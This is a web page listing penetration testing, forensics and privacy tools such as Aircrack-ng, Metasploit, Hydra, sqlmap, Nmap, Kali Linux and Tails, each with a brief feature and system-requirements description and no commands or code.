Cybersecurity Tools

Ethical Hacking Tools used for Penetration Testing and Malware Analysis

Aircrack-ng: Wireless WEP/WPA cracking utilities
Aircrack-ng is a complete suite of tools to assess WiFi network security.
Monitoring: Packet capture, export data for further processing by 3rd party tools
Attacking: Replay attacks, deauthentication, fake access points, packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)

All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

Assemblyline 4
Assemblyline 4 is an open source malware analysis platform. It is designed to assist cyber defence teams to automate the analysis of files and to better use the time of security analysts. Build using cloud technologies, it can scale from small to large scale enterprise security operation scanning millions of files a day and provide triage capabilities.

Assemblyline can be easily integrated in your environment using its powerful restApi and web interfaces. The platform comes with dozens of services to provide deep file analysis and enable integration with other security platforms such as anti-virus, malware detonation sandboxes and threat knowledge bases. Best of all, with a little bit of Python code you can extend it yourself by creating new analysis and integration services.

BeEF: Browser Exploitation Framework
Penetration testing tool that focuses on the web browser. BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser.

BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Operating System: Mac OSX 10.5.0 or higher / modern Linux. Ruby 2.3+ and Gems. SQLite 3.x. Node.js 6+.

Burp Suite Community Edition: Graphical application web application security
Burp Suite Community Edition is a feature-limited set of manual tools for exploring web security. Proxy your HTTPS traffic, edit and repeat requests, decode data, and more.

For the best experience, use a machine with at least 8 GB of memory and 2 CPU cores. If you are performing large amounts of work, or testing large or complex applications, you may need more memory than this.

If you're a newbie it's highly recommended to join PortSwigger's Web Security Academy.

Hydra Parallelized Login Cracker
Hydra supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.

Kali Linux
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Kodachi The Secure OS
Kodachi operating system is based on Ubuntu 18.04.5 it will provide you with a secure, anti-forensic, and anonymous operating system considering all features that a person who is concerned about privacy would need to have in order to be secure.

Kodachi is very easy to use all you have to do is boot it up on your PC via USB drive then you should have a fully running operating system with established VPN connection + Tor Connection established + DNScrypt service running. No setup or Linux knowledge is required from your side its all been automated for you. The entire OS is functional from your temporary memory RAM so once you shut it down no trace is left behind all your activities are wiped out.

Maltego Community
Maltego is software used for open-source intelligence and forensics, developed by Paterva from Pretoria, South Africa. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining.

Maltego uses Java and runs on Windows, Mac and Linux operating systems. The Client requires at minimum of 4GB of RAM. Any modern multi-core processor (i3 or above) will have more than enough processing power. 4GB of disk space. KVM w/1080p display.

Metasploit Project
Metasploit gives you insight that’s backed by a community of well over 200,000 users and contributors: It’s the most impactful penetration testing solution on the planet. With Metasploit you can uncover weaknesses in your defenses, focus on the highest risks, and improve your security outcomes.

Simulate real-world attacks to find your weak points before a malicious attacker does. Metasploit seamlessly integrates with the open-source Metasploit Framework, giving you access to exploitation and reconnaissance modules to save you effort and accelerate testing. Use attacker techniques to evade antivirus, find weak credentials, and pivot throughout the network.

Metasploit Unleashed
The most complete and in-depth Metasploit guide available, with contributions from the authors of the No Starch Press Metasploit Book. This course is a perfect starting point for Information Security Professionals who want to learn penetration testing and ethical hacking, but are not yet ready to commit to a paid course. We will teach you how to use Metasploit, in a structured and intuitive manner. Additionally, this free online ethical hacking course makes a wonderful quick reference for penetration testers, red teams, and other security professionals.

mitmproxy is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. You can prettify and decode a variety of message types ranging from HTML to Protobuf, intercept specific messages on-the-fly, modify them before they reach their destination, and replay them to a client or server later on.

NetSpot Wi-Fi Site Surveys, Analysis, Troubleshooting
NetSpot is the only professional app for wireless site surveys, Wi-Fi analysis, and troubleshooting on Mac OS X and Windows. It's a FREE Wi-Fi analyzer. No need to be a network expert to improve your home or office Wi-Fi today! All you need is your MacBook running Mac OS X 10.10+ or any laptop with Windows 7/8/10 on board and NetSpot which works over any 802.11 network.

Supports 2.4 GHz and 5 GHz frequency bands at 20/40/80/160 MHz channels.

Requires .NET framework 4.5+

Upgrades are a one-time purchase and available with Lifetime Upgrade Guarantee

Nikto2 Command-line Vulnerability Scanner
Nikito scans webservers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received.

Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Any system which supports a basic Perl installation should allow Nikto to run. Windows (using ActiveState Perl and Strawberry Perl). Some POSIX features, such as interactive commands may not work under Windows. Mac OSX and Various Linux and Unix installations (including RedHat, Solaris, Debian, Ubuntu, Kali, etc.)

NIST Cybersecurity Framework
Identify, Protect, Detect, Respond, Recover

5 functions provide top-level descriptions of the cybersec dev process.

The Framework is voluntary guidance, based on existing standards, guidelines, and practices for organizations to better manage and reduce cybersecurity risk. In addition to helping organizations manage and reduce risks, it was designed to foster risk and cybersecurity management communications amongst both internal and external organizational stakeholders.

It will assist in determining which activities are most important to assure critical operations and service delivery. In turn, that will help to prioritize investments and maximize the impact of each dollar spent on cybersecurity.

Nmap: Network Mapper
Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

OWASP Offensive Web Testing Framework
OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST.

See the big picture and think out of the box. More efficiently find, verify and combine vulnerabilities. Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions. Perform more tactical/targeted fuzzing on seemingly risky areas.

OWTF is developed on Kali Linux and macOS but it is made for Kali Linux (or other Debian derivatives). OWTF supports Python3. Homebrew required for OSX.

Parrot Security
Parrot is a worldwide community of developers and security specialists that work together to build a shared framework of tools to make their job easier, standardized and more reliable and secure.

Parrot was designed to be a very comfortable environment for security experts and researchers. It includes many basic programs for daily use which pentesting distributions usually exclude (at the cost of less than an additional gigabyte of storage). This choice was taken to make Parrot not only a good system to perform security tests, but also a good environment where you can write reports, build your own tools, and communicate seamlessly with teammates, without the need for additional computers, operating systems or configuration.

Santoku Linux
Santoku is dedicated to mobile forensics, analysis, and security, and packaged in an easy to use, Open Source platform.

A bootable Linux environment designed to make life easier. Tools useful when examining mobile malware. Tools to forensically acquire and analyze data. Supporting security assessment of mobile apps.

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Tails is a portable operating system that protects against surveillance and censorship.

Tails, or The Amnesic Incognito Live System, is a security-focused Debian-based Linux distribution aimed at preserving privacy and anonymity. All its incoming and outgoing connections are forced to go through Tor, and any non-anonymous connections are blocked. The system is designed to be booted as a live DVD or live USB, and will leave no digital footprint on the machine unless explicitly told to do so. Tails also comes with UEFI Secure Boot.

Tsurugi Linux
Tsurugi Linux is a heavily customized Linux distribution based on Ubuntu 16.04 LTS version (64-bit with a 5.4.2 custom kernel) and is designed to support DFIR investigations, malware analysis and OSINT activities. Since 2019 has been added also a special section dedicated to computer vision investigations with many custom tools.

Two repositories (master and development) have been created to be able to deliver bugfix, improvements and custom updates. Other security updates are guaranteed by officials Ubuntu repositories. The main idea behind the Tsurugi Linux project is about simplicity as far as the topics can be really complex, however basic Linux skills are mandatory to be able to work correctly and make the most of it.

Minimum requirements: 2 GHz dual core processor or better. 4 GB system memory. 30 GB of free hard drive space.

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

Wireshark Network Protocol Analyzer
Wireshark development thrives thanks to the volunteer contributions of networking experts around the globe and is the continuation of a project started by Gerald Combs in 1998.

Rich VoIP analysis. Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others.

Capture files compressed with gzip can be decompressed on the fly. Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform). Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.

Coloring rules can be applied to the packet list for quick, intuitive analysis. Output can be exported to XML, PostScript®, CSV, or plain text. Multi-platform: Runs on Windows, Linux, macOS, Solaris, FreeBSD, NetBSD, and many others.